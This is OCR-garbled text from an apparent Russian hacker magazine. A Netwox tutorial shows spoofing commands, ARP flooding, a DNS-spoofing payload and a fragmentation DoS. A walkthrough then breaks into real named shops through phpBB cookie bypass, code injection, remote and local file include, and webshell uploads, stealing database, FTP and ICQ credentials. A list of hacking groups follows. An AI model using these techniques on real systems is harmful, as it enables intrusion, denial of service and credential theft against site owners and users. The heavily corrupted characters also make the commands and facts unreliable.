установочного пакета. РТЕМ еще никому не вредило. Тем же, кто 
остался, я попытаюсь показать самые вкусные фишки и самые 
интересные приемы работы, которые можно творить и прово- 
рачивать с Ыеіѵѵох. Пожалуй, признаюсь тебе честно — люблю 
я этот пакет даже не столько за обилие предоставляемых им 
утилит, с которыми ты сможешь разобраться в два счета, сколь- 
ко за отменные возможности генерации и спуфинга пакетами 
различных протоколов. Вот, например, вопрос на засыпку: как 
сгенерировать ІРѵб ТСР-пакет и отправить его в Сеть? «Да зачем 
он мне?» — ответишь ты. Однако спешу напомнить, что прото- 
кол 1Рѵ4 доживает свой век ввиду его ограниченности, а поэтому 
недалеки времена поголовного применения ІРѵб, так почему бы 
не поиграть с этим сейчас, если есть такая возможность? Кроме 
того, эрудиция в нашем деле стоит не на последнем месте. Но не 
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будем уходить в философские размышления. Итак, у тебя есть 
два пути: пользоваться консольной навигацией по утилитам или 
же использовать продвинутый графический интерфейс. Первый 
ты можешь увидеть, вбив в консоли Ыеіѵѵох. Второй — напеча- 
тав Ыеіѵѵад (смотрим на рисунке). Если ты пользовался автома- 
тической установкой под ОС ѴѴІпсІоѵѵз, то в главном меню есть 
ярлыки на обе эти утилиты. О недостатке навигации в консольной 
версии ІМеІѵѵох можно сказать так: очень просто заблудиться в 
трех соснах. Собственно, вся навигация сводится к следующе- 
му: для нахождения какой-либо требуемой возможности необ- 
ходимо пройтись по интересующему иерархическому дереву до 
утилиты, а затем запустить ее или в интерактивном режиме ввода 
параметров (клавиша «К»), либо задав их все сразу (клавиша 
«В»), Второй вариант работы в консоли предназначен для тех, 
кто точно знает, что ему искать: тебе необходимо просто вбить 
Ыеіѵѵох сномер утилиты> [список параметров]. Графический же 
интерфейс позволяет все это проделывать на вкладке «ЗеагсЬ», 
после двойного клика на ссылку во вкладке Рогт задаются необ- 
ходимые параметры (нужные отмечаются галочкой), жмахаем 
«Ѳепегаіе», затем «Вип II» и смотрим на результат. Итак, вернем- 
ся к ІРѵб ТСР-пакету. Сгенерировать его проще пареной репы: 

# пеіѵѵох 142 — сіеѵісе “ЕІІіО” -еііі-згс “00:11:22:33:44:55” -еііі-сізі “0:8:9:а: 
Ь:с” --ірб-згс “(ес0:0:0:1 ::1 ” -Ірб-Озі “(ес0:0:0:1 ::2” -(ср-$гс “1 235” -іср-Озі 
“80” --іср-зуп 

Поясняю: 142 — номер утилиты Зрооі ЕНпегпеіІрбТср, -сіеѵісе — 
используемая сетевая плата, -еііт-вгс и — ейт-бзі — ЕІІпегпеІ-адрес 
отправителя и получателя, -ірб-згс — ІРѵб адрес отправителя, 
-ірб-сізі — получателя, -Іор-згс и -бзі порты, -Іср-зуп — установ- 
ленные флаги. Точно таким же образом можно заспуфить ІРѵ4 
ТСР-пакет. Единственное различие в том, что ір-адреса будут в 
привычном нам четырехбайтовом представлении и номер ути- 
литы будет уже не 142, а 34 — Зрооі Е11тегпе(1р4 раскеі. 

АКР-5РООРІІМО 

Ну вот, а теперь, познав базовые принципы работы с 
Ыеіѵѵох, перейдем к основной части нашего занятия. 
Например, загрузим АВР-кэш недоброжелателя запро- 
сами. Так поступают некоторые ЭоЗ'еры. Делается это 
таким образом. С помощью утилиты 33 Эізріау іпіогтаііоп 
абоиі ап ІР абсігезз ог а бозіпате узнаем его (атаку- 
емого) ЕіЬегпеІ-адрес. Далее, с помощью утилиты 80 
РегіобісаІІу зепб АВР герііез, начнем отправлять запро- 
сы вот так: пеіѵѵох 80 -еііі 00:1 1 :2Р:95:42:Р1 -ір 192.168.0.1 
—сіеѵісе “ЕІІіО” --еііиізі 0:8:9:а:Ь:с — ір-сізі 192.168.1.1/ — зіеер 
500. Первая группа адресов представляет собой те 
адреса, которые следует сделать недоступным для 
второй группы. Ну и -зіеер 500, — время задержки в 
миллисекундах между повторениями. Думаю, здесь не 
должно быть ничего непонятного. 

ОИЗ-ЗРООНГІС 

Займемся делами посерьезнее и попробуем подсунуть 
на тачку под управлением ѴѴІпсІоѵѵз ХР подмененный 
ответ ЭЫЗ-сервера. Пусть на этом компьютере нет 
никаких брандмауэров, кроме стандартного Місгозоіі 
Іпіегпеі Соппесііоп ЕігеѵѵаІІ, который сконфигурирован 
на логирование всех бгорреб-пакетов и успешных под- 
ключений. Пользователь, пытаясь зайти на некоторый 
ѵѵеЬ-сайт, ІІВІ_ которого ѵѵѵѵѵѵ.зогпеѵѵеЬзіІе.ога , вбивает 
адрес в Іпіегпеі Ехріогег. В результате этого ЭІхІЗ-запрос 
посылается о порта 1026 тачки пользователя (допустим 
ее ІР-адрес будет 192.168.1.1) на 53 порт ЭІМЗ-серве- 
ра с ІР-адреоом 192.168.1.254. В это время заспуфен- 
ный 0143-ответ, в виде І4е1ВІ05-данных, посылается с 
фейкового ІР-адреса 10.10.10.1 злым дядей Пупкиным, 
сообщая машине атакуемого, что адрес ѵѵеб-сервера 



— 192.168.1.77. ІР-адрес 192.168.1.77 в действительности нахо- 
дится под контролем все того же злого дядьки, причем на глав- 
ной странице он написал нехорошее слово из трех букв :). Этот 
І4еІВЮЗ-пакет, отловленный ЕіИегеаГом, можно рассмотреть на 
скриншоте под номером 6. 

Естественно, в качестве снифера можно было бы использовать 
утилиту из состава І4е1ѵѵох, однако это у меня не вышло, так как в 
процессе написания статьи я обнаружил досадный и очень стран- 
ный баг: на параметр — ІІІІег Ыеіѵѵох ругался, поясняя, что ІР-адрес 
не является булевым полем. Ну да бог с ним, с Васей Посмотрим 
лучше, как можно такой пакет создать. Это очень просто сделать 
с помощью все того же любимого мной ІМеіѵѵох: 

пеіѵѵох 38 -Ір4-$гс 10.10.10.1 -Ір4-сі$1 192.168.1.1 -ір4-рго1осо1 17 
-Ір4-сіа1а 00890402004400000003858000000001000000002046484550464 
3454С45484 

643455046464641 4341 4341 4341 4341 4341 4341 424с000001 0001 0001 51 800 
004с0а80140 

Непонятными остаются только параметры -Ір4-сіаіа и — Ір4- 
ргоіосоі. Назначение первого параметра достаточно легко 
уяснить из ВЕС по ЭІЧЗ: в данных находится возвращаемый на 
ЭИЗ-запрос ІР-адрес 192.168.1.77. Параметр -ір4-ргоІосоі 17 
означает, что Пупкин конструирует ІЮР-пакет. Второй способ 
конструирования такого пакета кажется мне еще более удобным. 
Для этого воспользуемся утилитой 39, которая автоматически 
подсчитает контрольную сумму пакета: 

пеіѵѵох 39 -Ір4-$гс 10.10.10.1 -Ір4-сіз1 192.168.1.1 -и<ір-згс137 
— исір-сізі 1026 -исір-сіаіа 0003858000000001000000002046484550464345 
4С45484 

6434550464646414341 43414341 434143414341 424с000001 0001 0001 51 800 
004с0а80140 



а втома тй3 



лиия пг ° иЕСС ' 4 



Естественно, иногда приходится автоматизировать про- 
цесс работы с некоторыми программами. Если ты пользу- 
ешься *піх-1іке системой — с тобой все понятно: регі или 
ЬазЬ- скрипты спасут мир. А что же делать пользователям 
\ѴіпсІо\Ѵ5? Можно, безусловно, писать пакетные ЬаІ:-файлы,Ѵ 
но это решение не для нас :). Ты ведь поставил ТСЬ для ' 
ГгопГ-епсІ оболочки пеГѵѵа§? Вот и используй все его воз 
можности на всю катушку и по назначению. Нам требует- 
ся узнать информацию (ЕсЬегпеГ- адрес и имена) о каждом 
хосте из подсети 192.168.0.* — пишем простенький ТСЬ- 
скрипт: 

# ! /изг/Ьіп/ѵѵізЬ 
Гог {зеГ і 0} {$і < 255} {іпсг і} { 
рШз “\пТезгіп§ $і” 
зег ірасі “192.168.0.$і” 
іГ[саІсЬ {ехес пеГѵѵох 3 $ірас1} сіага] { 
ріШ “Еггог <1игіп§ ехес : $<іаІ:а” 

} еізе { 
ріШ $6а1:а 
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Что же мы о этого получим? Если бы несчастный атакуемый пос- 
мотрел в данный момент кэш 0143-запросов на период в один 
день, отравленным злым Пупкиным, он бы увидел там вот что: 

ѵталл/.зотеи/еЬзіІе.огд 



ВесогсІ ІЧате : РНЕРРСЕІ_ЕНРСЕРРРРАСАСАСАСАСАСАВІ_ 

Весогй Туре : 1 

Тіте То [_іѵе . . . . : 86364 

баіа І_епд(іі : 4 

Зесііоп : Апежег 

А(Нозі) ВесогсІ 192.168.1.77 

Такая вот печальная ситуация. Естественно, данный пример сугу- 
бо теоретический и не стоит применять его на практике, так как 
это не особо приветствуется нашими доблестными государс- 
твенными органами, тем более что для проведения такой атаки 
необходимо угадать номер ІЮР-порта и Ю транзакции, хотя это и 
не столь проблематично. Кроме того, такой пакет придется сгене- 
рировать не один, а, как минимум, десяток, чтобы подменить этот 
злосчастный ІІВІ_. Но моей целью не стоит подробное обсужде- 
ние этого метода атаки, подробнее о нем ты можешь узнать из 
электронного журнала РЬгаск №62 статьи Мізіакез іп Иге ВЕС 
Ѳиібеііпез оп 0143 Зрооііпд АІІаскз. 

ВОЗЕ РВАСМЕГІТАТІОМ АТТАСК 

Последний пример я объясню на основе способа осуществления 
атаки Возе Егадтепіаііоп, метод и технологию которой подробно 
осветил хакер под ником ѲепсіаІІ. Так как мое место в журнале 
небезгранично, подробно почитать об этом стоит здесь: Ыір:// 
біаИаІ.пеІ/~аапсІаІІ/Возе Егаа АНаск Ехоіаіпесі.іхі . В дополнение 
к І4еІѵгох нам понадобится не менее полезная утилита — Ыетезіз 
( ѵѵѵга/.раскеііасіогѵ.пѳі/ргоіесіз/пѳтѳзіз ). Поставь его для опреде- 
ленности в корень диска С:Ѵ Условимся в следующем: пусть А — 
компьютер атакующего, В — атакуемый компьютер под управле- 
нием ѴѴІпсІм/оз 2000 со всеми сервис-паками, его ІР-адрес, напри- 
мер, будет 10.32.3.15, С — некий сторонний компьютер. Далее 
сохраним файлы Рістрсіаіа.іхі, Рісрбаіа.іхі и Рибрбаіа.іхі, кото- 
рые СепсіаІІ специально скорректировал для создания подходя- 
щих фрагментированных пакетов. Найти эти файлы для всех про- 
токолов можно по адресам: Іг1{р://біаі1аІ.пе1/~аапбаІ1/Р1срба1а.1х1 
Ы1р://біаі1аІ.пе1/~аапбаІ1/Рибрба1а.1х1 

И11р://біаі1аІ.пе1/~аапбаІ1/Рістрба1а.1х1 . Также нам понадобится 
файл петІТІІгпб.хІз (ИПр://біді1аІ.пеІ/~дапбаІ1/петІТІІтб.хІз). 

Его следует отредактировать, поэтому выделяй в нем строки и 
опускайся до тех пор, пока не получим 700 строк, далее сохра- 
няем под именем Іетр.сзѵ — МЗ-ООЗ Сотта Зерагаіеб ТехІ. 
Затем переименуем его в (етр.іхі и откроем. В нем ты увидишь 
такую вот кашу: 

петезіз істр -5 10. ,3,., 64, .,121, -И 10.32.3.15 -61 -і 8 -1 ,7242, -Р Рістрсіаіа. 
М -РМ0,~,петезіз ір -5 10. ,3,., 64, .,121, -б 10.32.3.15 -61 -I ,7242, 

Тут нужно заменить все тильды («~») на\п, а «,» — на пробелы, 
после чего сохранить текст и выйти. Полученный файл пере- 
именовываем в Іетр.ЬаІ и помещаем в папку с Ыетезіз. Затем 
воспользуемся снифером, входящим в состав І4еІ\л/ох под счас- 
тливым номером 7 для сбора случайных пакетов, которые нам 
понадобятся для отправки ІЧетезіз’ом: 

пеіиох 7 -оиііііѳ “петезізріпдЬід.ІхІ” -гесогЬепсогіе “Ьеха” -ІІІІег “Ііозі 
10.32.3.15" 

В данном случае все собранные пакеты, уходящие на ІР-адрес 














І4еЬл/ад, графическая оболочка 
[хіеіѵѵох 




снифаем 0143 траффик с помощью І4еІм/ад 



10.32.3.15, будут записаны в шестнадцатеричном виде в файл 
петезізріпдЬід.ІхІ. Далее откроем командную строку и наберем: 
С:\петезіз>Іетр.ЬаІ Оставив Ыетезіз работающим в течение 
нескольких часов, мы получим около 35,000 пакетов. Если ско- 
рость канала компьютера А достаточно велика, то фрагментиро- 
ванные ІСМР-запросы с компьютера С покажут, что компьютер не 
отвечает (ріпд Рециезі Тіте Оиі). Когда работа І4етезіз закончит- 
ся, компьютер В снова подаст признаки жизни. Теперь попробу- 
ем устроить ОоЗ другим методом. Отправим все эти пакеты разом 
с помощью утилиты І4еІѵгох 14 — Зрооі а гесогб: пеіѵгох 14 -з — Тііе 
петезізріпдЬід.ІхІ. Что же мы получим теперь, выполнив ріпд -I -I 
1600 10.32.3.15? Атакуемый компьютер будет находиться в дауне 
на протяжении не менее 2 — 3 минут. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Так что же мы имеем? Не стоит опошлять смысл слова, ведь в дейс- 
твительности данная программа в руках деструктора может превра- 
титься в страшное оружие, хотя и была изначально создана как ути- 
лита для администраторов и их потребностей в тестировании марш- 
рутизаторов, сетей и т.п. , а не как набор хакерских утилит. Пользуйся 
[хіеіѵѵох с умом и не применяй его в злых целях — больше позитива, 
друг мой. И напоследок хочу отметить, что в своей статье по большей 
части я использовал только утилиты І4еІ\л/ох из класса спуферов и 
конструкторов пакетов, но это лишь малая часть из всего их много- 
образия, ведь с помощью ЫеЬл/ох можно даже запустить бэкдор на 
поруганной тачке, стоит лишь найти утилиту ТСР-сервер или даже 
НТТР-сервер удаленного администрирования или поднять времен- 
ный РТР- или $МТР-сервер. Однако, так и бьль, оставлю их изучение 
тебе. Не бойся, в них нет ничего сложного. Ах, да! Помнится, обещал 
рассказать тебе, как с помощью іхіеіѵѵох сварить кофе. Думаешь, 
что это невозможно? Не-а! І_аигеп1 Сопзіапііп, создатель программы, 
решил что и эту возможность стоит добавить — запускай Ыеіѵѵох 
190, и через несколько секунд твой кофе будет готов. 

вшапѵ ѵоип'з ЦП 
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ТЕХТ МАГ / ѴѴАРР.ѴШ 
/ ІСО 878477 / 



К КОМУ 
УХОДЯТ 
АСИ? 



БЫСТРЫЙ ВЗЛОМ 
СЕТЕВЫХ МАГАЗИНОВ 




МНЕ ВСЕГДА ХОТЕЛОСЬ ПОСМОТ- 
РЕТЬ НА ВНУТРЕННОСТИ МАГА- 
ЗИНОВ, ЗАНИМАЮЩИХСЯ ПРО- 
ДАЖЕЙ ІСО ЦІКГОВ. КУЧА БАБОК 
В ѴѴМ-КОШЕЛЬКАХ, ГОРЫ ШЕСТИ- 
ЗНАКОВ — ВСЕ ЭТО ЖДЕТ ВЗЛОМ- 
ЩИКОВ. СЕГОДНЯ НА МОЕМ ОПЕ- 
РАЦИОННОМ СТОЛЕ НЕСКОЛЬКО 
ИЗВЕСТНЫХ ПАЦИЕНТОВ: ЦІІХІ5НОР. 
СОМ . І\ЮМЕРіКОѴ.[\ІЕТ И ШИТСОМ : 
ЕШОѴ! 



Никогда не используй одинаковые 
пароли для баз данных и фтп! 

И запомни! Никогда не повторяй 
проделанного в статье — уголовно 
наказуемо! 




Используемые скрипты: 
г57зИеІ1: 

гзІѵоісІ.ги/сІО'/ѵпІоасІ/г575ІіеІІ.М 

г57рѵуз: 

гзі.ѵоісі.ги/сіоѵѵпіоасі/ 

) . г57рѵуз.М 

Файл-Менеджер, удобный в инклѵде: 
ѵѵарр.ги/сІіг.М 



5ЕХ ѵѵітн ишзнор.сом 

Давай сразу приступим к делу. Вспомнив о сервисе сІотаіпзсІЬ.пеІ 
поищем соседей нашего магазина с установленным рЬрВВ-фору- 
мом (чтоб не напрягаться, естественно, в поисках багов) :). Для 
иіпзііор.сот таковым оказался зѵзіетіопб.ги . Осматриваемся. 
Версия форума неизвестно какая, админ мудро убрал авторские 
копирайты. Но все же на всякий случай проверяем наличие уяз- 
вимости в параметре ИідЫідЫ: 

Ѵ'/Ѵ'/У'/.зѵз{етФпб.гиЯогит/ѵіеѵ'/{оріс.рЬр?р=873&ЫаІпІіай{=%2527 

Ничего не получается, форум не выдает никакой ошибки, значит, 
будем использовать более новую уязвимость всех версий форума 



рНрВВ<=2.0.17 — связки рбр-функции ргед_герІасе() и переменной 
зідпаШге_ЬЬсобе_иіб (м-да, с регулярными выражениями у авторов 
рНрВВ беда, учите паттерны!). Итак, пробуем регистрироваться... 
Неудача! Активация пользователей на форуме осуществляется 
самими администраторами. Вспоминаем про еще одну уязвимость 
форума — возможность входа под любым пользователем через 
багу в кукисах. Нам нужен аккаунт админа, значит, идем в браузер 
Опера, в меню Сервис->Дополнительно->Управление соокіез (если 
ты сидишь не в Опере, то поищи на пзб.щ или на \отѵ\д/.хакео.ги проги 
для редактирования оных), ищем там \д/ѵѵ«/.зѵзГетІопсІ.ги . удаляем 
содержимое переменной ісопЬоагсІ_зісІ (да-да, так админы назвали 
кукисы, думали, что это чем-то поможет, наивные), а в ісопЬоагсД 
с!а(а вставляем следующее значение: 
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а%ЗА2%ЗА%7Вз%ЗА1 1 %ЗА%22аиІоІодіпШ%22%ЗВЬ%ЗА1 %ЗВз%ЗА6%ЗА 
%22изѳгісІ%22%ЗВз%ЗА1 %ЗА%222%22%ЗВ%70 

Поясню, с помощью этой строки мы залогинимся под пользовате- 
лем с Іс1=2, так как в скрипте, отвечающем за вход, недостаточно 
проверяется соответствие типов переменных. Если вдруг тебе 
понадобится другой пользователь, то ты легко можешь вставить 
любой іб в это значение здесь: ЗА%22[ісІ]%22%ЗВ%70 

БЕРЕМ ОТ АДМИНА ВСЕ 

Перезагружаем страницу (так, чтобы в ее параметрах не было зіб, 
так как о любым существующим значением зіб ничего не получит- 



ся), в итоге оказываемся залогиненными под администратором 
[ Кибезпік ]. Итак, идем в редактирование профиля нашего адми- 
на :). Сохраняем страницу себе на хард, в МтІ-коде находим 

<(огт айіоп="рго(ІІе.ріір" теІІіосІ="розІ - > 
и меняем на 

<(огт асІіоп=«иж.5узІетІоп(і.гиЛогит/рго(ІІе.рНр?зідпаІиге_ЬЬсосіе_ 
иі(Ц.*)/е%00 теІІіосІ="ро5І"> 

Загружаем полученную страницу и в поле подписи вставляем 
[Ь :ІІ I ѳ_деі_со піе п(з ($_С ЕТ [ Ь Ь] ) 

В это место можно, естественно, вставить любой рНр-код, в том 
числе и зуз1ет() после «[Ь:». Но сейчас нам нужна именно функ- 
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ция получения содержимого файла. Нажимаем «Отправить» и 
идем по ссылке ѵѵѵѵѵѵ.вѵз{етіопсІ.гиЯогит/ргойІе.рНр?тосІе=есІИрг 
ок!е&ЬЬ=сопйа.р1т В поле подписи нам открылось содержание 
сопІід.рЬр , которое можно увидеть на скрине. 

Пробуем залогиниться с полученными данными на фтп: 

Хост зузіетТопсІ.ги 
Юзер зузТопсІ 
Пароль з(о$11тах700 

Неудивительно, что пароль подошел, обычно админы таких сай- 
тов крайне беспечны :). Далее, для удобства, запиваем г57зИеІІ 
под именем зѵз(ет!опсі.ги/п260903-2.рИ{тІ , чтобы не палиться 
преждевременно (файлов с такими именами там много, видать, 
новости сайта). Начинаем исследовать сервер. Прежде всего 
смотрим /еіс/раззѵѵс/ , узнаем с помощью банальной эрудиции имя 
юзера для иіпзбор.сот (иіпзИор) и пробуем вломиться в /боте/ 
иіпзбор/риЫіс ЫтІ/. 

У нас получилось :). Скажу сразу, что ничего интересного на 
сайте не было, так как действуют они через сторонний сервис 
біаізеііег.ги . Паролей, к сожалению, тоже не удалось достать, а 
жаль, так как они могли подойти к аккаунту магазина на дигисел- 
лере. Что ж, еще не все потеряно, идем дальше. 



І40МЕПК0Ѵ.МЕТ — УДАЧНЫЙ ПОХОД 

По аналогии с предыдущим магазином ищем с помощью 
ботаіпзсІЬ.пеІ рбрВВ форум на сервере, на котором хостится 
наш магазин. Сегодня удачный день :). Практически первый же 
попавшийся форум на сайте сІІ-зНе.сот оказывается уязвимым к 
баге в НідНІІдМ-параметре! Только толку от нее оказалось мало. 
Был включен рбр за?е-тосІе. Многие стандартные рбр-функции 
были недоступны. Но я нашел выход :). Я написал миниатюрный 
файл-менеджер с функциями шелла, специально предназначен- 
ный для работы в инклуде. Его код, естественно, можно найти 
на врезке или скачать на ѵѵарр.ги/сііг.ьд . Далее заливаем его на 
полученный ранее Йр-аккаунт зѵзіетіопб.ги , опять же, чтобы не 
палиться. Выполняем следующий запрос: 

ѵѵѵѵѵѵ.бі-зИе.сотЛогит/ѵіеѵ>Лоріс.рИр?р=2&ЫаЫіаІ~і{=%2527. 
Іпс1ис1е($ ѲЕТ[ЬЫ).%2527&ЬЬ=зѵз{етІопсІ.ги/біг.М 
И получаем такую вот ошибку: 

1_Іпкпо\л/п(зузІеітйопсІ.ги/с1іг.ІхІ)\Ь#і): ЕаіІесІ Іо орел зігеат: НИР 
гедиезі (аііеб! 

Я долго гадал, почему это не сработало, но так и не понял. 
Видимо, какие-то экзотические настройки рбр. Но в результате 
экспериментов наш файл все же получилось заинклудить с помо- 
щью функции еѵаІ(), параметр которой выполняется, как рбр-код. 
Выполняем запрос: 

\д/\д/\д/.бі-зі{е.сотЛогит/ѵіеѵѵ{ооіс.рбр?р=2&біабІіаб{=%2527.еѵаІ($ 
ОЕТГЬЫ).%2527&ЬЬ=іпс!ис!е($ СЕТ[аа1):&аа=зѵз(етІопб.ги/біг.М 

Есть! Вседиректорииифайлыкакналадони! Итак, смотрим сопПд. 
рЬр, проверяем полученный пароль (геіизба) на фтп! Пароль, 
естественно, подходит :). Теперь нужно залить веб-шелл, чтобы 
изучить сервер. Так как включен за^е-тосіе для рбр, обычный 
г57збеІІ нам не подойдет, так как слишком мало возможностей для 
изучения сервера. Недолго думая, заливаем в ,/риЫіс бйпІ/саі-Ьіп 
г57р\л/з веб-шелл, написанный на регі (респект гзііеат!) и выстав- 
ляем ему права 0755, чтобы он мог выполняться. Идем по адре- 
су: сІІ-зИе.сот/саі-Ьіп/г57рѵѵз.саі , вводим пароль «г57» и смотрим 
/еіс/раввмсі . Нужный нам юзер угадывается сразу — потегкоѵ14. 
Пытаемся пройти в его папку, как в первом случае: 




Если вдруг с помощью уязвимости с недо- 
статочной проверкой переменной хіцтагцгс_ 
ЬЬсос1е_иіс1 тебе не удастся выполнить рЬр-код, 
а ты тем временем будешь обычным зарегиным 
пользователем, то ничто не мешает получить 
тебе статус админа и вволю покуражиться 
над несчастным форумом. Делаем все так же: 
сохраняем страницу с редактированием про- 
филя себе на хард и ищем строку 
<&гт асПоп= " ргоГіІе.рЬр " теі:Ьос1= " роке" >, 
затем меняем ее на 

<Догт асі:іоп= "ѵісгіт.ги/р]ірВВ2/ргоШе. 
рЬр?хіц;пагигс_Ых'осІс_иіс1= 1 1 ,шег_1еѵе1= 1 1 " 
тетЬосі="ро8і: "> 

Как видно, здесь имеет место простая хрі- 
инъекция. Естественно, это будет работать 
при отключенном тафс_циоі:е5_§рс :) Еще 
иногда бывает, что в ріір отключена директи- 
ва гефхгег_ц;1оЬаІ8. Выход из этого есть, только 
работает он на рЬр<=4.4.0. Тебе надо переда- 
вать нашу переменную всего лишь в формате 
« ?Ст I X) В А I Ф I хі§п аШгс_ЪЪсо<іс_иі<і ] = » 





пароль от БД подходит и к фтп 
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/Ноте/потегкоѵі 4/сІотаіпз/потегкоѵ.пеІ/риЫіс ЩтІ/ 



Ничего не вышло :(. Продолжаем дальше изучать сервер. Ага, в 
/изг/іосаі/ѵѵѵѵѵѵ видим диру сіігесіасітіп. Логинимся в сіа под нашим 
юзером сіізііе с паролем геІивМа. 

РНРМѴАОМШ И КРИВЫЕ РУКИ КОДЕРОВ 

После успешного логина идем в сіі-зііе.сот— Базы данных 
МуЗ(Ж~ рІірМуАсІтіп, логинимся под юзером из сопіід.рЬр 
(сІІ5ІІе_гооІ). Ты спросишь, для чего мы это сделали? Заряди гугл 
запросом «рНртуасІтіп ехріоіі» и зацени количество дырок в 
этом известнейшем скрипте управления базами данных тузді :). 
Еще, как правило, в системах управления сайтами рітртуасітіп 
для всех аккаунтов общий и запущен под более привилегирован- 
ным юзером, чем у нас есть. То есть стоит покопаться в выдан- 
ных гуглом багах. Теперь осматриваемся в рИртуабтіп'е. Клево, 
версия 2.6.1-рІЗ, страдающая локальным инклудом файлов. Для 
использования инклуда заливаем на фтп в паблик уже известный 
нам скрипт для чтения директорий и выполнения команд біг.іхі 
(он удобен тем, что сам оперирует с $01)ЕПУ_ЗТПІМС, поэтому он 
идеально подходит в тех случаях, когда залить веб-шелл не уда- 
ется, но можно инклудить любые локальные и удаленные файлы) 
под именем аІШЬІ.ІІЬ.рІтр. Далее открываем следующий ІІР1І_: 

бі-зіІе.сот/рбртѵасІтіп/ІІЬгапев/сІаІаЬазѳ іп{еіЧасе.ІІЬ.р[гр?сЩ[3 
егѵег]|~ех{епзіоп1=../../../../../../../../../../../Иоліе/бІ5Ие/сІотаіпз/бі-5Ие. 
сот/риЫіс И{тІ/аІІ&біга=/Ьоте/потегкоѵ1 4/ботаіпз/потегкоѵ. 
пеГ/риЫіс ЫтІ/ 

В результате чего успешно получаем список файлов и директо- 
рий магазина потегкоѵ.пеі :). Кстати, на этом же сервере лежит 
и иіпгд.сот : 

йі-$ііе.сот/рИртуасітіп/ІІЬгагіе5/с1аІаЬа8е_іп1ег(асе.ІІЬ.рІір?с(д[5егѵег][ех 
Іеп8Іоп]=.. /Ііоте/(іізіІе/(іотаіпз/(іі-8ІІе.сот/риЫіс_ІіІтІ/ 
аІІ&сііга=/коте/иіП22/с1отаіпз/иіП22.сот/риЫіс_МтІ/ 

Только ничего интересного там тоже нет. Ненавижу сторонние 
торговые площадки ! Итак, мы можем просматривать чужие дирек- 
тории, благодаря тому, что рИртуабтіп запущен под юзером 
арасИе, имеющим на это право. Идем в директорию собственно 
шопа — опііпе. Смотрим конфиги, проверяем базу шопа, которая 
оказывается пустой в плане номерков и паролей. Не круто, конеч- 
но, но это еще не все :). Смотрим опять диру опііпе и открываем 
ранее не замеченные файлики — опііпе/иіп.іхі и опІіпе/и.М :). И 
что мы видим? Правильно, уины и пароли :). 



ЗАКЛЮЧЕНИЕ 

На этом заканчиваю. Думаю, теперь владельцам магазинов стоит 
трижды подумать, выбирая себе хостинг, а еще лучше завести 
себе нормальный выделенный сервер :). Кстати, ко всем исполь- 
зуемым уязвимостям есть свои эксплойты на гзг.ѵоісі.ги . но все же 
советую все делать ручками. 

ОТ РЕДАКТОРА 

Вот видишь, дорогой друг. Любовь — штука сильная, вынужда- 
ет людей делать плохие поступки. Но если их не делать, то и 
жить, я думаю, незачем. На этой грустной реалистической ноте 
мы закончим рассказы про взлом уже приевшихся рбрВВ-фору- 
мах, думаю, надолго. Ведь на свете еще так много интересного, 
приятель! 

ВІНДКѴ ѴОІІН'5 ЦП 





Купи диск в сетях магазинов 




и выигрывай призы на сІіОпе.ги 



Виртуальная школа 03 Опе - единственная 
мультимедийная школа диджеинга в мире, 
дающая тебе возможность научиться играть 
на пластинках, СО, трЗ и даже бесплатно пройти 
эксклюзивный скретч-курс! 



Кроме того, благодаря этому диску ты узнаешь, 
как стать радиодиджеем, а зарегистрировавшись 
после покупки на шѵѵѵ.сІ)Опе.ги - как выиграть 
массу ценных призов! 



Будь первым, и первые призы могут стать твоими! 



Ищи диск в торговых сетях, указанных ниже, 

и на шшшІіОпе.ги/зІіорз 




т‘ и; т а ні иі к 

В ИДЕО- РЕКОР Д'С 



^АЙСБЕКС 



I «■■■■* 



Лдгутда * 



•ПИТАНИИ: 
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СуЬегІогсІз Соттипііу 

ммм . СуЬегІогсІз . пеЬ 
Год основания : 2002 
Проект создан : кОра и Сопсіог 
ІКС: #суЬег1огсіз ігс . ісдіпіо . ги 


МегР 

ммм.пегГ. ги 

Год основания: 2000 

Группа создана: ѵірее 


2 

ІІпІОск 

ЬЬЬр: //ммм.ехрІоіЬегг .огд/ 
Год основания: 2004 (?) 
Проект создан :БагкЕад1е 


Ни24 Зесигііу Теат 

Ь.Ы;р: //ммм.ги24-1:еат.пе1: 

Год основания: 2005 

Группа создана: ЫіЬгех & Бокк21 

ІКС: #ги24 ігс . ісдіпГо . ги 


4 

ВІаекІ_одіс 

ІѵЫір : / /ммм. Ыаскіодіс . пеЬ/ 
Год основания: 2004 


5 

АиЕІ4 Наск Теат 

ЬЬЬр : / /ммм . аЬЬеат . огд/ 
Год основания: 2003 
Группа создана : МаХ 


Асоіуіег 

ЪЫ:р : //ммм . асоІуЬег . сот/ 

Год основания: 2002 

Проект создан: КОгОІ 

ІКС: #асо1уЬе2, ігс.мепеЬ.ги 


7 ЫтрісІ Вуіе 

ЬЬЬр : //ІЪуЬе . ги/ 

Год основания : 1999 (2002) 
ІКС: #1ітріс1Ьу1;е, ЕТпеЬ 


8 

Неы_ Кыіантз 

ЬЬЬр : //ЬеІІкпідЬЬз . ѵоісі. ги 
Год основания: 2005 (?) 



1 Пожалуй, СуЬег1_огсГы ничуть не менее известны, чем ПЗТ/СНС, но вот интерьвью что-то никто у них до сих пор не 
брал. Вероятно, в некоторой степени уклон на приват мешает этому. СуЬегЬогсІз Сотплипііу — старая команда, изна- 
чально создававапась как зесигііу іеат, но позже занявшаяся другими сферами деятельности, порой более прибыль- 
ными ;). Тем не менее продолжает выпускать релизы, статьи и радовать поклонников ими. 2 ІЧегІ в свое время была 
очень активной Ыаскітаі-дгоир. Сейчас, как и тОО, ушла в приват, но их релизы доступны на сайте и по сей день. А во- 
обще, в рунете осталось очень мало подобных ей, действительно стоящих ЫаскЬаІ-команд. 3 Наверняка ты встречал 
множество сплоитов под загадочной маркой ІІпІОск. Эта команда имеет длинную историю, однако сейчас они находят- 
ся в полном привате. Из доступных материалов публике представлены лишь и/еЬ-блоги мемберов. Но поговаривают, что 
группа ушла в полный оффлайн... 4 Не прощу себе, если не упомяну команду Ви24 Зесигііу Теат, мембером которой 
является ваш покорный слуга. Ви24 Зесигііу Теат — достаточно новая и динамично-развивающаяся дгауЬаІ-команда, 
постоянно выпускающая новые релизы и статьи. Ей едва исполнился год, но она уже успела обзавестись большим 
френд-листом, поменять дизайн сайта, повоевать с ССТеат, а точнее с ее главой Тгізіат'ом, которого наверняка пом- 
нят наши читатели по конфликту с N30. Статьи и ѴізиаІНаск'и наших мемберов, среди которых с1к_(І1з), ІМІІгех, ты. 
